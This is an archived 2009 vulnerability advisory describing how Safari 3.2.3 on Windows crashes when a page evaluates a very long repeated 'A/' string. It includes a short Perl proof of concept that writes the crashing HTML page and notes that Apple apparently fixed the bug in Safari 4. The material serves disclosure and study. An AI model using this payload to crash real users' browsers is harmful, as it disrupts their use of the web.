Safari 3.2.3 (Win32) JavaScript 'eval' Remote Denial of Service Exploit

Type securityvulns
Reporter Securityvulns
Modified 2009-09-08T00:00:00




Safari 3.2.3 (Win32) JavaScript 'eval' Remote Denial of Service Exploit

Jeremy Brown [] 09.07.2009


Safari crashes when interpreting a webpage that calls the "eval" JavaScript function with "A/" repeating

21526 times (43052 bytes). When triggering this vulnerability, Safari will throw a "Stack Overflow"

exception, and then an access violation when adjusting the trigger to "A/" repeating 21697 times

(43394 bytes). The problem originates in the module "WebKit.dll". Safari uses this module as part of the

WebKit layout engine (

This issue was reported to Apple several months ago and it looks like they fixed it in Safari 4

(4.1.2 tested) after recent testing. It has also been lying around the Fun Archive @ for

quite a while too. Btw, STACK_OVERFLOW does NOT mean there is a buffer overflow on the stack. It pretty

much means that the stack for the process has been exhausted and its maximum size has been reached.


$fn = 'letsgosurfinnowwithsafari.html'; $size = 21526; # "Stack Overflow" WebKit.dll

$size = 21697; # "Access Violation" WebKit.dll

$payload = '<html><script type="text/javascript">' . "\n"; $payload = $payload . 'eval("' . "A/" x $size . '");' . "\n"; $payload = $payload . '</script></html>';

 open&#40;FD, &#39;&gt;&#39; . $fn&#41;;
 print FD $payload;